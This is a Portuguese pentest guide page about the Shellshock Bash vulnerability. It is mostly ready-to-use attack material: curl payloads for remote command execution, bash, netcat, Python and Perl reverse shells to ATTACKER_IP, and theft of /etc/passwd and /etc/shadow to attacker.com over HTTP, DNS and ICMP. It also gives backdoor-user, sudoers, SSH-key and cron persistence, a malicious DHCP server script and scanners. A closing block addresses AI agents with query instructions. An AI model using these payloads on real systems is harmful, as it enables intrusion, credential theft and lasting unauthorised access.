# Shell Shock **O que é Shellshock** Shellshock é uma vulnerabilidade crítica no GNU Bash que permite a execução de comandos arbitrários através de variáveis de ambiente especialmente crafted. Descoberta em setembro de 2014, afetou bilhões de sistemas Unix/Linux. ### **Características Principais** * CVE-2014-6271 (Bug Original) * CVE-2014-7169 (Variante Incompleta) * Afeta Bash versões 1.14 até 4.3 * Execução remota de código (RCE) * Exploração através de variáveis de ambiente * Impacto crítico (CVSS 10.0) ### **Como Funciona** ```bash # Bash processa funções em variáveis de ambiente # NORMAL: Define uma função env x='() { :;}; echo vulnerable' bash -c "echo test" # COMPORTAMENTO ESPERADO: # Define função x # Executa "echo test" # COMPORTAMENTO VULNERÁVEL: # Define função x # EXECUTA "echo vulnerable" (comando extra!) # Executa "echo test" ``` ### **Fluxo da Vulnerabilidade** ```mermaid sequenceDiagram participant A as Atacante participant S as Servidor Web participant B as Bash Shell participant OS as Sistema Operacional Note over A: FASE 1 - Preparação A->>A: Cria payload na variável Note right of A: Payload Shellshock detectado Note over A,S: FASE 2 - Injeção A->>S: Requisição HTTP (Header malicioso) Note right of S: Inserção em User-Agent ou Cookie Note over S,B: FASE 3 - Processamento S->>B: Chama script CGI Note right of B: Define variáveis de ambiente Note right of B: Bash interpreta a função e executa o sufixo B->>B: Vulnerabilidade de Parsing Note over B,OS: FASE 4 - Execução B->>OS: Executa comando extra (malicioso) OS-->>B: Retorna resultado B-->>S: Retorna output combinado S-->>A: Dados exfiltrados ``` ### **Por que é Perigoso** | Aspecto | Impacto | | --------------- | ---------------------------------- | | **Prevalência** | Bilhões de dispositivos afetados | | **Exposição** | Servidores web, CGI, DHCP, SSH | | **Exploração** | Extremamente simples | | **Privilégios** | Executa com permissões do processo | | **Detecção** | Difícil de detectar em logs | ## **⚔️ Mecanismos de Ataque** ### **Anatomia do Payload** ```bash # ESTRUTURA BÁSICA () { :;}; comando_malicioso # BREAKDOWN: # () { :;} - Define função vazia válida # ; - Separador de comandos # comando - Código executado FORA da função ``` ### **Exemplos de Payloads Básicos** ```bash # 1. Teste simples de vulnerabilidade () { :;}; echo "VULNERABLE" # 2. Exfiltração de dados () { :;}; cat /etc/passwd # 3. Reverse shell () { :;}; /bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 # 4. Download e execução de malware () { :;}; wget http://evil.com/malware.sh -O /tmp/m.sh && bash /tmp/m.sh # 5. Adição de usuário backdoor () { :;}; useradd -m -p $(openssl passwd -1 hacked123) backdoor # 6. Modificação de arquivos críticos () { :;}; echo "attacker ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers ``` ### **Variações do Bug** ```bash # CVE-2014-6271 (Original) () { :;}; comando # CVE-2014-7169 (Incomplete Fix) () { (a)=>\' bash -c "echo vulnerable" # CVE-2014-7186 (Nested Functions) bash -c 'true <_[$($())] { echo vulnerable; } ``` ### **Contextos de Exploração** ```http # Via HTTP Headers User-Agent: () { :;}; comando Referer: () { :;}; comando Cookie: session=() { :;}; comando Accept-Language: () { :;}; comando X-Forwarded-For: () { :;}; comando # Via CGI Scripts GET /cgi-bin/script.cgi?param=() { :;}; comando # Via DHCP Client # Servidor DHCP envia opções maliciosas # Via SSH Commands ssh user@host '() { :;}; comando' ``` ## **🔧 Técnicas de Exploração** ### **Técnica 1: Detecção de Vulnerabilidade** #### **1.1 Teste Manual Básico** ```bash # Teste local no bash env x='() { :;}; echo VULNERABLE' bash -c "echo Testing" # Se aparecer "VULNERABLE", o sistema está vulnerável # Teste com diferentes shells env x='() { :;}; echo VULNERABLE' sh -c "echo Testing" env x='() { :;}; echo VULNERABLE' dash -c "echo Testing" ``` #### **1.2 Teste via HTTP** ```bash # Usando curl curl -H "User-Agent: () { :;}; echo; echo VULNERABLE" http://target.com/cgi-bin/test.cgi # Usando wget wget -U "() { :;}; echo; echo VULNERABLE" http://target.com/cgi-bin/test.cgi # Teste múltiplos headers curl -A "() { :;}; echo; echo 'UA-TEST'" \ -e "() { :;}; echo; echo 'REF-TEST'" \ -H "Cookie: test=() { :;}; echo; echo 'COOKIE-TEST'" \ http://target.com/cgi-bin/test.cgi ``` #### **1.3 Script de Detecção Automatizada** ```python #!/usr/bin/env python3 # shellshock_detector.py import requests import sys class ShellshockDetector: def __init__(self, target_url): self.target = target_url self.vulnerable_headers = [] def generate_test_payload(self, marker): """Gera payload de teste único""" return f"() {{ :;}}; echo; echo {marker}" def test_header(self, header_name, marker): """Testa vulnerabilidade em um header específico""" headers = { header_name: self.generate_test_payload(marker) } try: response = requests.get(self.target, headers=headers, timeout=10) if marker in response.text: return True, response.text return False, None except Exception as e: return False, str(e) def scan(self): """Executa scan completo""" test_headers = [ 'User-Agent', 'Referer', 'Cookie', 'Accept-Language', 'X-Forwarded-For', 'X-Real-IP', 'Accept', 'Accept-Encoding' ] print(f"🎯 Target: {self.target}") print(f"🔍 Testing {len(test_headers)} headers...\n") for header in test_headers: marker = f"SHELLSHOCK_{header.upper()}" is_vulnerable, response_data = self.test_header(header, marker) if is_vulnerable: print(f"✅ VULNERABLE via {header}") self.vulnerable_headers.append({ 'header': header, 'marker': marker, 'response': response_data[:200] }) else: print(f"❌ Not vulnerable via {header}") return { 'target': self.target, 'vulnerable': len(self.vulnerable_headers) > 0, 'vulnerable_headers': self.vulnerable_headers } # Uso if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 shellshock_detector.py ") sys.exit(1) detector = ShellshockDetector(sys.argv[1]) results = detector.scan() if results['vulnerable']: print("\n⚠️ SYSTEM IS VULNERABLE TO SHELLSHOCK!") print(f"📊 Vulnerable headers: {len(results['vulnerable_headers'])}") else: print("\n✅ System appears to be patched") ``` ### **Técnica 2: Exploração para RCE** #### **2.1 Command Injection Básico** ```bash # Listar diretório curl -A "() { :;}; echo; /bin/ls -la" http://target.com/cgi-bin/test.cgi # Ler arquivo sensível curl -A "() { :;}; echo; /bin/cat /etc/passwd" http://target.com/cgi-bin/test.cgi # Verificar usuário atual curl -A "() { :;}; echo; /usr/bin/whoami" http://target.com/cgi-bin/test.cgi # Informações do sistema curl -A "() { :;}; echo; /bin/uname -a" http://target.com/cgi-bin/test.cgi ``` #### **2.2 Reverse Shell** ```bash # Bash TCP Reverse Shell curl -A "() { :;}; echo; /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" \ http://target.com/cgi-bin/test.cgi # Netcat Reverse Shell curl -A "() { :;}; echo; /bin/nc -e /bin/bash ATTACKER_IP 4444" \ http://target.com/cgi-bin/test.cgi # Python Reverse Shell curl -A "() { :;}; echo; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'" \ http://target.com/cgi-bin/test.cgi # Perl Reverse Shell curl -A "() { :;}; echo; perl -e 'use Socket;\$i=\"ATTACKER_IP\";\$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" \ http://target.com/cgi-bin/test.cgi ``` #### **2.3 Listener Setup** ```bash # No atacante, antes de enviar reverse shell # Netcat listener nc -lvnp 4444 # Metasploit multi/handler msfconsole -q -x "use exploit/multi/handler; set payload linux/x86/shell/reverse_tcp; set LHOST ATTACKER_IP; set LPORT 4444; exploit" # Socat listener com TTY socat file:`tty`,raw,echo=0 tcp-listen:4444 ``` ### **Técnica 3: Exfiltração de Dados** #### **3.1 Exfiltração via DNS** ```bash # Exfiltrar dados via DNS lookups curl -A "() { :;}; echo; nslookup \$(whoami).attacker-dns.com" \ http://target.com/cgi-bin/test.cgi # Exfiltrar conteúdo de arquivo curl -A "() { :;}; echo; nslookup \$(cat /etc/passwd | base64 | head -c 50).attacker-dns.com" \ http://target.com/cgi-bin/test.cgi # No servidor DNS do atacante, capturar queries tcpdump -i eth0 -n port 53 ``` #### **3.2 Exfiltração via HTTP** ```bash # Enviar dados via GET curl -A "() { :;}; echo; curl http://attacker.com/exfil?data=\$(cat /etc/passwd | base64)" \ http://target.com/cgi-bin/test.cgi # Enviar dados via POST curl -A "() { :;}; echo; curl -X POST -d \"\$(cat /etc/shadow)\" http://attacker.com/exfil" \ http://target.com/cgi-bin/test.cgi # Servidor de recebimento no atacante python3 -m http.server 8000 # ou nc -lvnp 8000 ``` #### **3.3 Exfiltração via ICMP** ```bash # Ping com dados no payload curl -A "() { :;}; echo; ping -c 1 -p \$(echo 'SECRET' | xxd -p) attacker.com" \ http://target.com/cgi-bin/test.cgi # Captura no atacante tcpdump -i eth0 icmp -X ``` ### **Técnica 4: Persistência** #### **4.1 Adição de Usuário Backdoor** ```bash # Criar usuário com sudo curl -A "() { :;}; echo; useradd -m -p \$(openssl passwd -1 'password123') backdoor && usermod -aG sudo backdoor" \ http://target.com/cgi-bin/test.cgi # Adicionar ao sudoers curl -A "() { :;}; echo; echo 'backdoor ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" \ http://target.com/cgi-bin/test.cgi ``` #### **4.2 SSH Key Backdoor** ```bash # Gerar chave no atacante ssh-keygen -t rsa -f shellshock_key # Adicionar chave pública ao servidor curl -A "() { :;}; echo; mkdir -p /root/.ssh && echo 'ssh-rsa AAAA...' >> /root/.ssh/authorized_keys && chmod 600 /root/.ssh/authorized_keys" \ http://target.com/cgi-bin/test.cgi # Conectar via SSH ssh -i shellshock_key root@target.com ``` #### **4.3 Cron Job Backdoor** ```bash # Adicionar reverse shell em cron curl -A "() { :;}; echo; (crontab -l 2>/dev/null; echo '*/5 * * * * /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1') | crontab -" \ http://target.com/cgi-bin/test.cgi # Verificar crontab curl -A "() { :;}; echo; crontab -l" \ http://target.com/cgi-bin/test.cgi ``` ## **🎯 Vetores de Ataque** ### **Vetor 1: Servidores Web (CGI)** #### **Identificação de CGI Scripts** ```bash # Diretórios comuns de CGI /cgi-bin/ /cgi-sys/ /cgi-mod/ /cgi/ /scripts/ /htbin/ # Scripts CGI comuns test.cgi status.cgi admin.cgi info.cgi stats.cgi test.sh ``` #### **Exploração de CGI** ```bash # Teste automático de múltiplos scripts for script in test status admin info stats; do echo "Testing: ${script}.cgi" curl -A "() { :;}; echo; echo VULNERABLE" \ "http://target.com/cgi-bin/${script}.cgi" 2>/dev/null | grep VULNERABLE done # Fuzzing de CGI scripts ffuf -w /usr/share/wordlists/dirb/common.txt \ -u http://target.com/cgi-bin/FUZZ.cgi \ -H "User-Agent: () { :;}; echo; echo VULNERABLE" \ -mc 200 ``` ### **Vetor 2: DHCP Client** #### **Servidor DHCP Malicioso** ```python #!/usr/bin/env python3 # malicious_dhcp.py from scapy.all import * from scapy.layers.dhcp import DHCP, BOOTP from scapy.layers.inet import IP, UDP class MaliciousDHCP: def __init__(self, interface='eth0'): self.interface = interface self.server_ip = '192.168.1.1' def create_malicious_dhcp_offer(self, transaction_id, client_mac): """Cria DHCP Offer com payload Shellshock""" # Payload Shellshock em DHCP option shellshock_payload = "() { :;}; /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" packet = ( Ether(dst=client_mac) / IP(src=self.server_ip, dst='255.255.255.255') / UDP(sport=67, dport=68) / BOOTP(op=2, yiaddr='192.168.1.100', siaddr=self.server_ip, chaddr=client_mac, xid=transaction_id) / DHCP(options=[ ('message-type', 'offer'), ('server_id', self.server_ip), ('subnet_mask', '255.255.255.0'), ('router', self.server_ip), ('lease_time', 3600), ('domain', shellshock_payload), # Payload em domain option 'end' ]) ) return packet def dhcp_handler(self, packet): """Handler para requisições DHCP""" if DHCP in packet and packet[DHCP].options[0][1] == 1: # DHCP Discover print(f"📡 DHCP Discover from {packet[Ether].src}") transaction_id = packet[BOOTP].xid client_mac = packet[Ether].src # Enviar DHCP Offer malicioso malicious_offer = self.create_malicious_dhcp_offer(transaction_id, client_mac) sendp(malicious_offer, iface=self.interface) print(f"💉 Sent malicious DHCP Offer to {client_mac}") def start(self): """Iniciar servidor DHCP malicioso""" print(f"🚀 Starting malicious DHCP server on {self.interface}") print(f"⚠️ Waiting for DHCP requests...") sniff(filter="udp and (port 67 or port 68)", prn=self.dhcp_handler, iface=self.interface) # Uso if __name__ == "__main__": server = MaliciousDHCP('eth0') server.start() ``` ### **Vetor 3: SSH ForceCommand** #### **Exploração via SSH** ```bash # Se servidor SSH usa ForceCommand com bash ssh user@target '() { :;}; /bin/bash' # Com comando específico ssh user@target '() { :;}; cat /etc/passwd' # Script de teste automatizado #!/bin/bash # ssh_shellshock_test.sh TARGET="user@target.com" echo "Testing SSH Shellshock vulnerability..." # Teste básico ssh $TARGET '() { :;}; echo VULNERABLE' 2>&1 | grep VULNERABLE && { echo "✅ Target is VULNERABLE!" # Tentar obter shell echo "🚀 Attempting to get shell..." ssh $TARGET '() { :;}; /bin/bash' } || { echo "❌ Target is not vulnerable or SSH not accessible" } ``` ### **Vetor 4: Git Repositories** #### **Exploração via Git Hooks** ```bash # Se git usa bash para hooks # Criar repositório malicioso git init malicious-repo cd malicious-repo # Criar post-update hook malicioso cat > .git/hooks/post-update << 'EOF' #!/bin/bash () { :;}; /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 EOF chmod +x .git/hooks/post-update # Push para servidor vulnerável git remote add origin user@target:/path/to/repo git push origin master ``` ## **🔍 Detecção e Scanning** ### **Scanner Automatizado Completo** ```python #!/usr/bin/env python3 # advanced_shellshock_scanner.py import requests import threading import queue import sys from urllib.parse import urlparse, urljoin class AdvancedShellshockScanner: def __init__(self, targets, threads=10): self.targets = targets if isinstance(targets, list) else [targets] self.threads = threads self.results = [] self.cgi_paths = [ '/cgi-bin/', '/cgi-sys/', '/cgi/', '/scripts/', '/cgi-mod/', '/htbin/', '/cgi-local/' ] self.cgi_scripts = [ 'test.cgi', 'test.sh', 'status.cgi', 'admin.cgi', 'info.cgi', 'stats.cgi', 'login.cgi', 'search.cgi', 'upload.cgi', 'display.cgi', 'cart.cgi' ] def generate_payloads(self): """Gera múltiplos payloads de teste""" return { 'CVE-2014-6271': "() { :;}; echo; echo VULNERABLE_6271", 'CVE-2014-7169': "() { (a)=>\\' bash -c \"echo VULNERABLE_7169\"", 'CVE-2014-6277': "() { x() { _; }; x() { _; } <_[$($())] { echo VULNERABLE_6278; }" } def generate_test_headers(self, payload): """Gera headers de teste com payload""" return { 'User-Agent': payload, 'Referer': payload, 'Cookie': f'test={payload}', 'Accept-Language': payload, 'X-Forwarded-For': payload, 'Accept': payload } def test_url(self, url, cve_name, payload): """Testa URL específica""" try: headers = self.generate_test_headers(payload) response = requests.get( url, headers=headers, timeout=10, verify=False, allow_redirects=True ) # Verificar múltiplos indicadores de vulnerabilidade markers = [ f'VULNERABLE_{cve_name.split("-")[-1]}', 'VULNERABLE', 'bash: warning', 'command not found' ] for marker in markers: if marker in response.text: return { 'vulnerable': True, 'url': url, 'cve': cve_name, 'marker': marker, 'response_snippet': response.text[:500] } return {'vulnerable': False, 'url': url, 'cve': cve_name} except Exception as e: return {'vulnerable': False, 'url': url, 'error': str(e)} def discover_cgi_scripts(self, base_url): """Descobre scripts CGI no alvo""" discovered = [] for cgi_path in self.cgi_paths: for script in self.cgi_scripts: full_url = urljoin(base_url, f'{cgi_path}{script}') try: response = requests.head(full_url, timeout=5, verify=False) if response.status_code in [200, 500]: discovered.append(full_url) print(f" 📄 Found: {full_url}") except: pass return discovered def worker(self, task_queue, result_queue): """Worker thread para processamento paralelo""" while True: try: task = task_queue.get(timeout=1) if task is None: break url, cve_name, payload = task result = self.test_url(url, cve_name, payload) result_queue.put(result) task_queue.task_done() except queue.Empty: break except Exception as e: print(f"Worker error: {e}") def scan(self): """Executa scan completo""" print("🚀 Starting Advanced Shellshock Scanner") print(f"🎯 Targets: {len(self.targets)}") print(f"🧵 Threads: {self.threads}\n") task_queue = queue.Queue() result_queue = queue.Queue() # Descobrir CGI scripts all_urls = [] for target in self.targets: print(f"🔍 Discovering CGI scripts on {target}...") discovered = self.discover_cgi_scripts(target) if discovered: all_urls.extend(discovered) else: # Se não encontrar, testar URL base all_urls.append(target) print(f"\n📊 Total URLs to test: {len(all_urls)}\n") # Gerar tarefas payloads = self.generate_payloads() for url in all_urls: for cve_name, payload in payloads.items(): task_queue.put((url, cve_name, payload)) # Iniciar workers workers = [] for _ in range(self.threads): t = threading.Thread(target=self.worker, args=(task_queue, result_queue)) t.start() workers.append(t) # Aguardar conclusão task_queue.join() # Parar workers for _ in range(self.threads): task_queue.put(None) for t in workers: t.join() # Coletar resultados while not result_queue.empty(): result = result_queue.get() if result.get('vulnerable'): self.results.append(result) # Reportar resultados self.print_results() return self.results def print_results(self): """Imprime resultados do scan""" print("\n" + "="*70) print("📊 SCAN RESULTS") print("="*70) if not self.results: print("✅ No vulnerabilities found") return print(f"⚠️ VULNERABILITIES FOUND: {len(self.results)}\n") for idx, result in enumerate(self.results, 1): print(f"\n🔴 Vulnerability #{idx}") print(f" URL: {result['url']}") print(f" CVE: {result['cve']}") print(f" Marker: {result['marker']}") print(f" Response snippet:") print(f" {result['response_snippet'][:200]}...") print("\n" + "="*70) # Uso if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 advanced_shellshock_scanner.py ") print("Example: python3 advanced_shellshock_scanner.py http://target.com") sys.exit(1) targets = sys.argv[1:] scanner = AdvancedShellshockScanner(targets, threads=10) scanner.scan() ``` ### **Nmap NSE Script** ```bash # Scan com script Shellshock do Nmap nmap -sV -p 80,443,8080 --script http-shellshock --script-args uri=/cgi-bin/test.cgi target.com ``` ```bash # Scan de range de IPs nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.c ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmorte.gitbook.io/bibliadopentestbr/tecnicas/web/back-end/shell-shock.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.